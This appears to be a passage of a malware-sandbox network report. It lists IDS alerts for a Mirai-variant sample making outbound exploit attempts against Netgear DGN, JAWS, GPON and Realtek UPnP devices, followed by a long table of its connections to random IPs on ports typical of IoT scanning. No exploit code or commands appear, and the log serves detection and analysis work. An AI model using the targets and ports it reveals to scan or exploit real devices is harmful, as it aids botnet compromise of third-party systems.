                                                                        2024-12-06T00:38:05.881431+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2351614168.131.71.9680TCP
                                                                        2024-12-06T00:38:05.892331+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335642220.221.19.11580TCP
                                                                        2024-12-06T00:38:05.892331+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335642220.221.19.11580TCP
                                                                        2024-12-06T00:38:05.894113+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23339964.31.247.15480TCP
                                                                        2024-12-06T00:38:05.894113+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23339964.31.247.15480TCP
                                                                        2024-12-06T00:38:05.894500+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23383121.115.64.247574TCP
                                                                        2024-12-06T00:38:05.895244+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2346200211.118.107.2008080TCP
                                                                        2024-12-06T00:38:05.899941+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233983281.78.199.549152TCP
                                                                        2024-12-06T00:38:05.912079+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233772235.58.195.1637574TCP
                                                                        2024-12-06T00:38:05.920427+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353590201.139.58.23880TCP
                                                                        2024-12-06T00:38:05.940389+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343726174.191.128.1228080TCP
                                                                        2024-12-06T00:38:05.941235+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2338016174.239.67.5880TCP
                                                                        2024-12-06T00:38:05.945262+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23578141.48.207.18449152TCP
                                                                        2024-12-06T00:38:06.166795+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2343654148.131.165.3980TCP
                                                                        2024-12-06T00:38:06.855458+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233546689.14.42.12680TCP
                                                                        2024-12-06T00:38:06.863329+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2335512141.132.253.25352869TCP
                                                                        2024-12-06T00:38:06.914898+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233594252.18.43.1957574TCP
                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 6, 2024 00:36:51.668828011 CET43928443192.168.2.2391.189.91.42
                                                                        Dec 6, 2024 00:36:55.280261040 CET5687480192.168.2.23118.175.124.25
                                                                        Dec 6, 2024 00:36:55.280934095 CET597168080192.168.2.2339.116.5.135
                                                                        Dec 6, 2024 00:36:55.281565905 CET3878880192.168.2.23169.40.164.181
                                                                        Dec 6, 2024 00:36:55.282541037 CET5309680192.168.2.2343.79.133.11
                                                                        Dec 6, 2024 00:36:55.283232927 CET340307574192.168.2.2386.51.139.199
                                                                        Dec 6, 2024 00:36:55.283870935 CET3682449152192.168.2.23117.116.60.186
                                                                        Dec 6, 2024 00:36:55.284549952 CET3469481192.168.2.2378.28.5.0
                                                                        Dec 6, 2024 00:36:55.285197020 CET4179080192.168.2.23169.253.87.242
                                                                        Dec 6, 2024 00:36:55.285845041 CET542468443192.168.2.2315.46.198.67
                                                                        Dec 6, 2024 00:36:55.286505938 CET531108443192.168.2.2395.133.117.213
                                                                        Dec 6, 2024 00:36:55.287159920 CET5081480192.168.2.2320.138.27.159
                                                                        Dec 6, 2024 00:36:55.287811041 CET6036049152192.168.2.23144.192.196.181
                                                                        Dec 6, 2024 00:36:55.288448095 CET6046281192.168.2.233.143.102.188
                                                                        Dec 6, 2024 00:36:55.289112091 CET5194680192.168.2.23160.64.200.250
                                                                        Dec 6, 2024 00:36:55.289764881 CET5082680192.168.2.2379.205.134.177
                                                                        Dec 6, 2024 00:36:55.290416002 CET515868443192.168.2.236.134.94.243
                                                                        Dec 6, 2024 00:36:55.291074038 CET4847280192.168.2.231.85.100.98
                                                                        Dec 6, 2024 00:36:55.291716099 CET3728637215192.168.2.23201.239.180.49
                                                                        Dec 6, 2024 00:36:55.292933941 CET4944237215192.168.2.23129.224.247.20
                                                                        Dec 6, 2024 00:36:55.293697119 CET5315837215192.168.2.23143.151.72.28
                                                                        Dec 6, 2024 00:36:55.294395924 CET4727852869192.168.2.2398.35.241.78
                                                                        Dec 6, 2024 00:36:55.295032978 CET3937080192.168.2.2380.180.109.86
                                                                        Dec 6, 2024 00:36:55.295681000 CET5059881192.168.2.2365.224.103.49
                                                                        Dec 6, 2024 00:36:55.296319962 CET5526680192.168.2.23144.94.116.224
                                                                        Dec 6, 2024 00:36:55.296968937 CET5254249152192.168.2.23146.136.103.163
                                                                        Dec 6, 2024 00:36:55.297614098 CET5587281192.168.2.2329.21.212.1
                                                                        Dec 6, 2024 00:36:55.298257113 CET467368080192.168.2.23104.212.159.134
                                                                        Dec 6, 2024 00:36:55.298862934 CET536088443192.168.2.23194.167.150.102
                                                                        Dec 6, 2024 00:36:55.299527884 CET379045555192.168.2.23164.194.135.238
                                                                        Dec 6, 2024 00:36:55.300159931 CET3675080192.168.2.23214.127.3.37
                                                                        Dec 6, 2024 00:36:55.300797939 CET395468080192.168.2.2324.51.61.43
                                                                        Dec 6, 2024 00:36:55.301420927 CET4285849152192.168.2.23110.77.244.54
                                                                        Dec 6, 2024 00:36:55.302062988 CET531148443192.168.2.2371.82.199.131
                                                                        Dec 6, 2024 00:36:55.302699089 CET4733849152192.168.2.23156.177.99.179
                                                                        Dec 6, 2024 00:36:55.303308010 CET445168080192.168.2.23129.222.135.49
                                                                        Dec 6, 2024 00:36:55.303920031 CET4520449152192.168.2.2363.218.221.150
                                                                        Dec 6, 2024 00:36:55.304578066 CET477928080192.168.2.23152.156.223.170
                                                                        Dec 6, 2024 00:36:55.305210114 CET4933281192.168.2.2328.64.132.145
                                                                        Dec 6, 2024 00:36:55.305854082 CET542148080192.168.2.23174.112.238.150
                                                                        Dec 6, 2024 00:36:55.306478977 CET3813880192.168.2.2348.209.236.164
                                                                        Dec 6, 2024 00:36:55.307116032 CET3748081192.168.2.23122.219.76.172
                                                                        Dec 6, 2024 00:36:55.307784081 CET503727574192.168.2.23100.40.238.158
                                                                        Dec 6, 2024 00:36:55.308429956 CET4671080192.168.2.2323.157.2.214
                                                                        Dec 6, 2024 00:36:55.309079885 CET3542280192.168.2.23142.225.53.129
                                                                        Dec 6, 2024 00:36:55.309708118 CET5884280192.168.2.2373.149.43.253
                                                                        Dec 6, 2024 00:36:55.310338974 CET452528080192.168.2.2343.10.138.186
                                                                        Dec 6, 2024 00:36:55.310972929 CET5728880192.168.2.2375.246.37.123
                                                                        Dec 6, 2024 00:36:55.311598063 CET3374080192.168.2.23195.102.149.63
                                                                        Dec 6, 2024 00:36:55.312249899 CET3738852869192.168.2.23121.208.165.185
                                                                        Dec 6, 2024 00:36:55.312881947 CET3723680192.168.2.23159.226.179.189
                                                                        Dec 6, 2024 00:36:55.313515902 CET357965555192.168.2.2384.207.247.119
                                                                        Dec 6, 2024 00:36:55.314171076 CET434488443192.168.2.23172.152.38.25
                                                                        Dec 6, 2024 00:36:55.314800978 CET5238280192.168.2.23187.208.34.38
                                                                        Dec 6, 2024 00:36:55.315448046 CET4937449152192.168.2.23204.19.175.144
                                                                        Dec 6, 2024 00:36:55.316076994 CET499628443192.168.2.23125.95.228.225
                                                                        Dec 6, 2024 00:36:55.316725969 CET415188080192.168.2.23162.10.150.72
                                                                        Dec 6, 2024 00:36:55.317368031 CET3643481192.168.2.2347.244.58.30
                                                                        Dec 6, 2024 00:36:55.318048954 CET542048080192.168.2.23161.159.158.251
                                                                        Dec 6, 2024 00:36:55.318698883 CET5389852869192.168.2.23140.49.192.11
                                                                        Dec 6, 2024 00:36:55.319340944 CET421848080192.168.2.2324.111.109.113
                                                                        Dec 6, 2024 00:36:55.332637072 CET402928443192.168.2.23174.161.22.78
                                                                        Dec 6, 2024 00:36:55.333281994 CET4625280192.168.2.231.98.140.42
                                                                        Dec 6, 2024 00:36:55.333940983 CET568968080192.168.2.23145.217.58.149
                                                                        Dec 6, 2024 00:36:55.334575891 CET5951849152192.168.2.23199.176.49.4
                                                                        Dec 6, 2024 00:36:55.335221052 CET544948080192.168.2.2379.72.226.128
                                                                        Dec 6, 2024 00:36:55.335858107 CET511565555192.168.2.2384.240.86.160
                                                                        Dec 6, 2024 00:36:55.336493969 CET493525555192.168.2.23189.47.162.68
                                                                        Dec 6, 2024 00:36:55.337131023 CET3981052869192.168.2.23157.80.252.25
                                                                        Dec 6, 2024 00:36:55.337774038 CET328748443192.168.2.23120.168.131.75
                                                                        Dec 6, 2024 00:36:55.338414907 CET447248443192.168.2.23175.63.134.34
                                                                        Dec 6, 2024 00:36:55.339051008 CET5651280192.168.2.2356.75.49.173
                                                                        Dec 6, 2024 00:36:55.339673042 CET5681680192.168.2.2385.36.32.17
                                                                        Dec 6, 2024 00:36:55.340342999 CET449308080192.168.2.2348.71.73.50
                                                                        Dec 6, 2024 00:36:55.340980053 CET553608080192.168.2.2316.250.88.8
                                                                        Dec 6, 2024 00:36:55.341614008 CET4957649152192.168.2.2337.133.196.204
                                                                        Dec 6, 2024 00:36:55.342263937 CET5145681192.168.2.2327.126.80.61
                                                                        Dec 6, 2024 00:36:55.342900991 CET3896080192.168.2.23102.154.96.78
                                                                        Dec 6, 2024 00:36:55.343575001 CET3378080192.168.2.23222.96.144.16
                                                                        Dec 6, 2024 00:36:55.344225883 CET351908443192.168.2.233.23.235.151
                                                                        Dec 6, 2024 00:36:55.344897985 CET5821680192.168.2.23143.101.55.97
                                                                        Dec 6, 2024 00:36:55.345540047 CET5043680192.168.2.23216.190.220.54
                                                                        Dec 6, 2024 00:36:55.346169949 CET4919480192.168.2.2368.42.36.210
                                                                        Dec 6, 2024 00:36:55.346816063 CET499248080192.168.2.2350.191.49.171
                                                                        Dec 6, 2024 00:36:55.347445965 CET404728080192.168.2.23197.142.218.136
                                                                        Dec 6, 2024 00:36:55.348113060 CET574365555192.168.2.2357.194.223.241
                                                                        Dec 6, 2024 00:36:55.348750114 CET4175480192.168.2.2333.11.207.173
                                                                        Dec 6, 2024 00:36:55.349383116 CET403628443192.168.2.2354.52.118.219
                                                                        Dec 6, 2024 00:36:55.350050926 CET5482480192.168.2.23215.161.47.220
                                                                        Dec 6, 2024 00:36:55.350677013 CET5644880192.168.2.239.106.14.123
                                                                        Dec 6, 2024 00:36:55.351329088 CET585025555192.168.2.2385.46.119.84
                                                                        Dec 6, 2024 00:36:55.351978064 CET3562480192.168.2.2326.112.167.54
                                                                        Dec 6, 2024 00:36:55.352643967 CET5480680192.168.2.23121.86.29.249
                                                                        Dec 6, 2024 00:36:55.353351116 CET456145555192.168.2.23135.20.150.219
                                                                        Dec 6, 2024 00:36:55.353996038 CET402948080192.168.2.2377.113.216.76
                                                                        Dec 6, 2024 00:36:55.354645967 CET4090437215192.168.2.2391.191.108.134
                                                                        Dec 6, 2024 00:36:55.355283976 CET498888080192.168.2.23171.79.125.191
                                                                        Dec 6, 2024 00:36:55.355962038 CET3640880192.168.2.23157.88.62.35
                                                                        Dec 6, 2024 00:36:55.356611967 CET4772880192.168.2.23184.242.24.210
                                                                        Dec 6, 2024 00:36:55.357266903 CET607587574192.168.2.23178.165.8.79
                                                                        Dec 6, 2024 00:36:55.357913017 CET401705555192.168.2.2327.18.230.139
                                                                        Dec 6, 2024 00:36:55.358541012 CET4506049152192.168.2.23176.86.103.29
                                                                        Dec 6, 2024 00:36:55.359210968 CET528268080192.168.2.23182.208.230.244
                                                                        Dec 6, 2024 00:36:55.359850883 CET5503080192.168.2.2368.175.16.144
                                                                        Dec 6, 2024 00:36:55.360495090 CET355328080192.168.2.23115.248.132.47
                                                                        Dec 6, 2024 00:36:55.361139059 CET350128080192.168.2.2345.231.135.189
                                                                        Dec 6, 2024 00:36:55.361788988 CET475545555192.168.2.23146.20.246.188
                                                                        Dec 6, 2024 00:36:55.362457037 CET525787574192.168.2.23142.230.94.50
                                                                        Dec 6, 2024 00:36:55.363095045 CET5568452869192.168.2.231.213.1.223
                                                                        Dec 6, 2024 00:36:55.363758087 CET3347680192.168.2.2346.14.252.194
                                                                        Dec 6, 2024 00:36:55.364404917 CET548668080192.168.2.23212.19.173.191
                                                                        Dec 6, 2024 00:36:55.365036964 CET3674452869192.168.2.2392.38.181.87
                                                                        Dec 6, 2024 00:36:55.365693092 CET3372480192.168.2.2322.47.205.194
                                                                        Dec 6, 2024 00:36:55.366323948 CET4790637215192.168.2.2318.48.0.22
                                                                        Dec 6, 2024 00:36:55.366991997 CET559968080192.168.2.23181.78.116.23
                                                                        Dec 6, 2024 00:36:55.367634058 CET449627574192.168.2.2369.200.69.138
                                                                        Dec 6, 2024 00:36:55.368299007 CET473668080192.168.2.2357.233.61.98
                                                                        Dec 6, 2024 00:36:55.368962049 CET482065555192.168.2.23209.39.207.150
                                                                        Dec 6, 2024 00:36:55.369590044 CET4548880192.168.2.2353.254.96.192
                                                                        Dec 6, 2024 00:36:55.370237112 CET4121680192.168.2.23212.175.190.28
                                                                        Dec 6, 2024 00:36:55.370887995 CET5077680192.168.2.2352.35.25.20
                                                                        Dec 6, 2024 00:36:55.371551037 CET530868080192.168.2.2363.90.139.102
                                                                        Dec 6, 2024 00:36:55.372176886 CET4733652869192.168.2.23114.134.116.214
                                                                        Dec 6, 2024 00:36:55.372838020 CET411308080192.168.2.2331.221.221.104
                                                                        Dec 6, 2024 00:36:55.373529911 CET4278480192.168.2.236.197.162.24
                                                                        Dec 6, 2024 00:36:55.388492107 CET4819080192.168.2.23150.49.139.129
                                                                        Dec 6, 2024 00:36:55.389127970 CET3666280192.168.2.23129.110.147.175
                                                                        Dec 6, 2024 00:36:55.389765024 CET368225555192.168.2.23184.220.87.241
                                                                        Dec 6, 2024 00:36:55.391498089 CET487148080192.168.2.23192.181.66.22
                                                                        Dec 6, 2024 00:36:55.392157078 CET3334637215192.168.2.2395.201.182.127
                                                                        Dec 6, 2024 00:36:55.392798901 CET5573852869192.168.2.23177.124.131.210
                                                                        Dec 6, 2024 00:36:55.393438101 CET366707574192.168.2.23108.175.170.193
                                                                        Dec 6, 2024 00:36:55.394073009 CET488168080192.168.2.23103.159.239.63
                                                                        Dec 6, 2024 00:36:55.394716978 CET464568080192.168.2.23149.193.148.34
                                                                        Dec 6, 2024 00:36:55.395284891 CET8056874118.175.124.25192.168.2.23
                                                                        Dec 6, 2024 00:36:55.395349979 CET5687480192.168.2.23118.175.124.25
                                                                        Dec 6, 2024 00:36:55.395389080 CET5516681192.168.2.23206.213.118.4
                                                                        Dec 6, 2024 00:36:55.395818949 CET80805971639.116.5.135192.168.2.23
                                                                        Dec 6, 2024 00:36:55.395876884 CET597168080192.168.2.2339.116.5.135
                                                                        Dec 6, 2024 00:36:55.396020889 CET427288443192.168.2.2332.247.129.246
                                                                        Dec 6, 2024 00:36:55.396425009 CET8038788169.40.164.181192.168.2.23
                                                                        Dec 6, 2024 00:36:55.396477938 CET3878880192.168.2.23169.40.164.181
                                                                        Dec 6, 2024 00:36:55.396642923 CET5254480192.168.2.2319.154.130.117
                                                                        Dec 6, 2024 00:36:55.397295952 CET525928080192.168.2.2377.237.7.131
                                                                        Dec 6, 2024 00:36:55.397943974 CET345968080192.168.2.23128.12.140.246
                                                                        Dec 6, 2024 00:36:55.398587942 CET4643449152192.168.2.23190.123.58.154
                                                                        Dec 6, 2024 00:36:55.399239063 CET3889280192.168.2.23142.115.135.32
                                                                        Dec 6, 2024 00:36:55.399876118 CET457628443192.168.2.23119.180.236.246
                                                                        Dec 6, 2024 00:36:55.400518894 CET518047574192.168.2.23159.189.182.100
                                                                        Dec 6, 2024 00:36:55.401177883 CET3531452869192.168.2.2399.162.112.187
                                                                        Dec 6, 2024 00:36:55.401840925 CET3513080192.168.2.2338.189.25.217
                                                                        Dec 6, 2024 00:36:55.402494907 CET4564281192.168.2.2395.118.139.239
                                                                        Dec 6, 2024 00:36:55.403074026 CET805309643.79.133.11192.168.2.23
                                                                        Dec 6, 2024 00:36:55.403111935 CET75743403086.51.139.199192.168.2.23
                                                                        Dec 6, 2024 00:36:55.403140068 CET5309680192.168.2.2343.79.133.11
                                                                        Dec 6, 2024 00:36:55.403140068 CET340307574192.168.2.2386.51.139.199
                                                                        Dec 6, 2024 00:36:55.403166056 CET5925849152192.168.2.2355.139.42.174
                                                                        Dec 6, 2024 00:36:55.403834105 CET3287080192.168.2.2353.223.145.174
                                                                        Dec 6, 2024 00:36:55.404289961 CET4915236824117.116.60.186192.168.2.23
                                                                        Dec 6, 2024 00:36:55.404330969 CET3682449152192.168.2.23117.116.60.186
                                                                        Dec 6, 2024 00:36:55.404489994 CET598588443192.168.2.2327.14.33.79
                                                                        Dec 6, 2024 00:36:55.405077934 CET813469478.28.5.0192.168.2.23
                                                                        Dec 6, 2024 00:36:55.405095100 CET8041790169.253.87.242192.168.2.23
                                                                        Dec 6, 2024 00:36:55.405106068 CET84435424615.46.198.67192.168.2.23
                                                                        Dec 6, 2024 00:36:55.405122995 CET3469481192.168.2.2378.28.5.0
                                                                        Dec 6, 2024 00:36:55.405136108 CET5001037215192.168.2.23185.35.83.146
                                                                        Dec 6, 2024 00:36:55.405142069 CET4179080192.168.2.23169.253.87.242
                                                                        Dec 6, 2024 00:36:55.405144930 CET542468443192.168.2.2315.46.198.67
                                                                        Dec 6, 2024 00:36:55.405165911 CET84435311095.133.117.213192.168.2.23
                                                                        Dec 6, 2024 00:36:55.405206919 CET531108443192.168.2.2395.133.117.213
                                                                        Dec 6, 2024 00:36:55.405796051 CET414408443192.168.2.2377.50.212.67
                                                                        Dec 6, 2024 00:36:55.406450033 CET459928080192.168.2.2383.191.83.234
                                                                        Dec 6, 2024 00:36:55.407078028 CET500748080192.168.2.23128.100.55.44
                                                                        Dec 6, 2024 00:36:55.407696962 CET498228080192.168.2.2370.136.186.81
                                                                        Dec 6, 2024 00:36:55.408358097 CET595365555192.168.2.2370.1.42.222
                                                                        Dec 6, 2024 00:36:55.408987045 CET517308443192.168.2.23196.21.246.20
                                                                        Dec 6, 2024 00:36:55.409619093 CET591388080192.168.2.2325.203.243.102
                                                                        Dec 6, 2024 00:36:55.410255909 CET591348443192.168.2.2346.79.121.4
                                                                        Dec 6, 2024 00:36:55.410907030 CET344348080192.168.2.23120.171.90.106
                                                                        Dec 6, 2024 00:36:55.411545992 CET545607574192.168.2.23108.8.51.27
                                                                        Dec 6, 2024 00:36:55.412182093 CET541907574192.168.2.2326.165.219.86
                                                                        Dec 6, 2024 00:36:55.412833929 CET4279680192.168.2.23210.76.1.253
                                                                        Dec 6, 2024 00:36:55.413476944 CET4763080192.168.2.2359.127.6.12
                                                                        Dec 6, 2024 00:36:55.414140940 CET4693837215192.168.2.2325.51.174.183
                                                                        Dec 6, 2024 00:36:55.414796114 CET5328481192.168.2.23153.14.52.155
                                                                        Dec 6, 2024 00:36:55.415427923 CET329208080192.168.2.2343.136.192.62
                                                                        Dec 6, 2024 00:36:55.416090965 CET590308080192.168.2.2368.104.71.243
                                                                        Dec 6, 2024 00:36:55.416738987 CET5041849152192.168.2.2374.121.250.48
                                                                        Dec 6, 2024 00:36:55.417367935 CET375448080192.168.2.23172.226.49.225
                                                                        Dec 6, 2024 00:36:55.418003082 CET488288080192.168.2.23101.130.93.192
                                                                        Dec 6, 2024 00:36:55.418682098 CET4343481192.168.2.23198.110.152.177
                                                                        Dec 6, 2024 00:36:55.419348955 CET5939281192.168.2.23180.189.218.79
                                                                        Dec 6, 2024 00:36:55.419950008 CET5974480192.168.2.2324.60.83.178
                                                                        Dec 6, 2024 00:36:55.420608997 CET4444080192.168.2.23179.184.84.34
                                                                        Dec 6, 2024 00:36:55.421248913 CET5776480192.168.2.2373.90.183.63
                                                                        Dec 6, 2024 00:36:55.421871901 CET518708080192.168.2.2390.153.54.244
                                                                        Dec 6, 2024 00:36:55.422508955 CET436268080192.168.2.23214.111.203.47
                                                                        Dec 6, 2024 00:36:55.423134089 CET504868443192.168.2.2392.189.191.216
                                                                        Dec 6, 2024 00:36:55.423782110 CET3769680192.168.2.2376.133.151.50
                                                                        Dec 6, 2024 00:36:55.424437046 CET4351680192.168.2.2339.11.173.155
                                                                        Dec 6, 2024 00:36:55.425043106 CET546868443192.168.2.23168.166.161.25
                                                                        Dec 6, 2024 00:36:55.425679922 CET416788443192.168.2.23116.111.91.113
                                                                        Dec 6, 2024 00:36:55.426309109 CET3915680192.168.2.23151.36.87.52
                                                                        Dec 6, 2024 00:36:55.426914930 CET550908080192.168.2.2348.90.206.169
                                                                        Dec 6, 2024 00:36:55.427544117 CET3385880192.168.2.2314.239.128.170
                                                                        Dec 6, 2024 00:36:55.428150892 CET536727574192.168.2.2367.237.240.84
                                                                        Dec 6, 2024 00:36:55.428788900 CET4896680192.168.2.23101.172.124.155
                                                                        Dec 6, 2024 00:36:55.429395914 CET477408080192.168.2.23101.147.63.141
                                                                        Dec 6, 2024 00:36:55.430031061 CET341045555192.168.2.2314.89.23.36
                                                                        Dec 6, 2024 00:36:55.431303978 CET4590281192.168.2.2331.140.214.51
                                                                        Dec 6, 2024 00:36:55.431921005 CET4068880192.168.2.23219.63.223.16
                                                                        Dec 6, 2024 00:36:55.432559967 CET5336049152192.168.2.23153.240.186.210
                                                                        Dec 6, 2024 00:36:55.433183908 CET4133480192.168.2.2373.18.143.204
                                                                        Dec 6, 2024 00:36:55.433805943 CET520508443192.168.2.2315.22.71.3
                                                                        Dec 6, 2024 00:36:55.434428930 CET5298249152192.168.2.2332.160.241.63
                                                                        Dec 6, 2024 00:36:55.435074091 CET5549880192.168.2.23182.198.195.130
                                                                        Dec 6, 2024 00:36:55.435714960 CET3781481192.168.2.2364.29.19.57
                                                                        Dec 6, 2024 00:36:55.436352015 CET4744081192.168.2.2349.24.94.191
                                                                        Dec 6, 2024 00:36:55.436964035 CET4833280192.168.2.23197.204.137.58
                                                                        Dec 6, 2024 00:36:55.437578917 CET543045555192.168.2.2394.56.235.17
                                                                        Dec 6, 2024 00:36:55.438216925 CET468328080192.168.2.23138.154.6.217
                                                                        Dec 6, 2024 00:36:55.438854933 CET346908443192.168.2.2358.27.122.15
                                                                        Dec 6, 2024 00:36:55.439495087 CET5318280192.168.2.23158.133.3.184
                                                                        Dec 6, 2024 00:36:55.440116882 CET4098880192.168.2.23117.184.53.182
                                                                        Dec 6, 2024 00:36:55.440762997 CET3389280192.168.2.2382.146.61.237
                                                                        Dec 6, 2024 00:36:55.441385031 CET471467574192.168.2.23112.185.80.51
                                                                        Dec 6, 2024 00:36:55.442003012 CET457008443192.168.2.23181.15.136.11
                                                                        Dec 6, 2024 00:36:55.442635059 CET5000249152192.168.2.2377.121.98.247
                                                                        Dec 6, 2024 00:36:55.443264008 CET548407574192.168.2.23109.222.95.21
                                                                        Dec 6, 2024 00:36:55.443900108 CET495945555192.168.2.23199.23.101.88
                                                                        Dec 6, 2024 00:36:55.444514990 CET5048680192.168.2.2373.177.193.220
                                                                        Dec 6, 2024 00:36:55.445142984 CET5207852869192.168.2.23191.245.227.83
                                                                        Dec 6, 2024 00:36:55.445772886 CET4488249152192.168.2.23181.245.251.146
                                                                        Dec 6, 2024 00:36:55.446393013 CET3285680192.168.2.23191.77.140.153
                                                                        Dec 6, 2024 00:36:55.446989059 CET418545555192.168.2.2398.125.56.208
                                                                        Dec 6, 2024 00:36:55.447596073 CET5330480192.168.2.23182.227.110.28
                                                                        Dec 6, 2024 00:36:55.448236942 CET4873081192.168.2.2334.139.201.213
                                                                        Dec 6, 2024 00:36:55.448874950 CET329965555192.168.2.23101.15.65.84
                                                                        Dec 6, 2024 00:36:55.449487925 CET580808443192.168.2.2367.217.252.15
                                                                        Dec 6, 2024 00:36:55.450119972 CET5120081192.168.2.2312.222.93.105
                                                                        Dec 6, 2024 00:36:55.450748920 CET5648280192.168.2.23133.9.23.21
                                                                        Dec 6, 2024 00:36:55.451363087 CET391765555192.168.2.2319.149.226.178
                                                                        Dec 6, 2024 00:36:55.452001095 CET418968080192.168.2.2313.194.80.189
                                                                        Dec 6, 2024 00:36:55.452632904 CET6088837215192.168.2.23109.25.203.105
                                                                        Dec 6, 2024 00:36:55.453267097 CET5348852869192.168.2.23202.88.157.165
                                                                        Dec 6, 2024 00:36:55.453881979 CET4348680192.168.2.23157.231.213.112
                                                                        Dec 6, 2024 00:36:55.454497099 CET5791237215192.168.2.2392.101.144.171
                                                                        Dec 6, 2024 00:36:55.455121994 CET449908080192.168.2.2314.20.190.62
                                                                        Dec 6, 2024 00:36:55.455749989 CET3974880192.168.2.23205.190.110.250
                                                                        Dec 6, 2024 00:36:55.456379890 CET517428080192.168.2.2314.112.238.214
                                                                        Dec 6, 2024 00:36:55.456990957 CET5294481192.168.2.23156.239.151.122
                                                                        Dec 6, 2024 00:36:55.457623959 CET5432480192.168.2.2324.168.121.6
                                                                        Dec 6, 2024 00:36:55.458225965 CET4989480192.168.2.23112.194.38.63
                                                                        Dec 6, 2024 00:36:55.458884954 CET328608080192.168.2.2311.48.182.3
                                                                        Dec 6, 2024 00:36:55.459516048 CET4761281192.168.2.23193.101.206.136
                                                                        Dec 6, 2024 00:36:55.460156918 CET4989080192.168.2.23152.96.212.208
                                                                        Dec 6, 2024 00:36:55.460768938 CET5194080192.168.2.23144.80.221.222
                                                                        Dec 6, 2024 00:36:55.461405993 CET349705555192.168.2.2334.86.117.21
                                                                        Dec 6, 2024 00:36:55.462022066 CET338508080192.168.2.2318.43.39.195
                                                                        Dec 6, 2024 00:36:55.462641954 CET4472837215192.168.2.2381.72.56.112
                                                                        Dec 6, 2024 00:36:55.463253021 CET536548080192.168.2.2348.137.212.42
                                                                        Dec 6, 2024 00:36:55.463865042 CET514268443192.168.2.23218.190.128.190
                                                                        Dec 6, 2024 00:36:55.464483976 CET5438849152192.168.2.23177.141.44.231
                                                                        Dec 6, 2024 00:36:55.465116024 CET5562680192.168.2.23144.176.109.6
                                                                        Dec 6, 2024 00:36:55.465728998 CET550648080192.168.2.23107.150.100.17
                                                                        Dec 6, 2024 00:36:55.466346979 CET5136280192.168.2.23210.92.63.90
                                                                        Dec 6, 2024 00:36:55.466968060 CET5060080192.168.2.23125.230.87.138
                                                                        Dec 6, 2024 00:36:55.467614889 CET3312052869192.168.2.23106.23.130.140
                                                                        Dec 6, 2024 00:36:55.468249083 CET373127574192.168.2.23186.93.85.188
                                                                        Dec 6, 2024 00:36:55.468905926 CET537788080192.168.2.23162.60.224.62
                                                                        Dec 6, 2024 00:36:55.469537973 CET449988443192.168.2.23200.210.196.178
                                                                        Dec 6, 2024 00:36:55.484496117 CET596888443192.168.2.2350.55.178.34
                                                                        Dec 6, 2024 00:36:55.485120058 CET472845555192.168.2.23213.33.239.153
                                                                        Dec 6, 2024 00:36:55.485770941 CET551588080192.168.2.2378.253.75.148
                                                                        Dec 6, 2024 00:36:55.486367941 CET4142081192.168.2.2333.20.233.190
                                                                        Dec 6, 2024 00:36:55.487014055 CET5111437215192.168.2.23118.197.10.107
                                                                        Dec 6, 2024 00:36:55.487637043 CET431348080192.168.2.23142.67.238.233
                                                                        Dec 6, 2024 00:36:55.488250971 CET3291680192.168.2.2315.252.209.178
                                                                        Dec 6, 2024 00:36:55.488882065 CET364948443192.168.2.23118.85.253.235
                                                                        Dec 6, 2024 00:36:55.489499092 CET4071849152192.168.2.23178.72.204.4
                                                                        Dec 6, 2024 00:36:55.490094900 CET4783637215192.168.2.235.174.228.198
                                                                        Dec 6, 2024 00:36:55.490693092 CET5807849152192.168.2.2396.81.159.236
                                                                        Dec 6, 2024 00:36:55.491278887 CET600228080192.168.2.2354.254.1.112
                                                                        Dec 6, 2024 00:36:55.491884947 CET5022880192.168.2.2381.210.236.238
                                                                        Dec 6, 2024 00:36:55.492491961 CET5022237215192.168.2.23171.88.32.116
                                                                        Dec 6, 2024 00:36:55.493125916 CET3740849152192.168.2.2358.25.214.119
                                                                        Dec 6, 2024 00:36:55.493733883 CET5388280192.168.2.2361.221.193.115
                                                                        Dec 6, 2024 00:36:55.494358063 CET417268080192.168.2.23212.232.123.121
                                                                        Dec 6, 2024 00:36:55.494959116 CET4130237215192.168.2.23137.202.127.253
                                                                        Dec 6, 2024 00:36:55.495560884 CET4904452869192.168.2.23173.224.150.117
                                                                        Dec 6, 2024 00:36:55.496187925 CET5804680192.168.2.2376.231.140.115
                                                                        Dec 6, 2024 00:36:55.496808052 CET5026280192.168.2.23202.51.201.37
                                                                        Dec 6, 2024 00:36:55.497410059 CET332028080192.168.2.23153.157.254.30
                                                                        Dec 6, 2024 00:36:55.498012066 CET590205555192.168.2.2325.40.34.74
                                                                        Dec 6, 2024 00:36:55.498617887 CET457587574192.168.2.2319.251.187.157
                                                                        Dec 6, 2024 00:36:55.499233961 CET449227574192.168.2.2375.14.247.30
                                                                        Dec 6, 2024 00:36:55.499838114 CET6012281192.168.2.231.228.137.84
                                                                        Dec 6, 2024 00:36:55.500451088 CET3446852869192.168.2.2341.43.78.104
                                                                        Dec 6, 2024 00:36:55.501071930 CET4810237215192.168.2.23144.147.141.226
                                                                        Dec 6, 2024 00:36:55.501679897 CET443388080192.168.2.23189.229.175.122
                                                                        Dec 6, 2024 00:36:55.502296925 CET5569280192.168.2.23182.149.46.3
                                                                        Dec 6, 2024 00:36:55.502907038 CET340868080192.168.2.23215.189.147.100
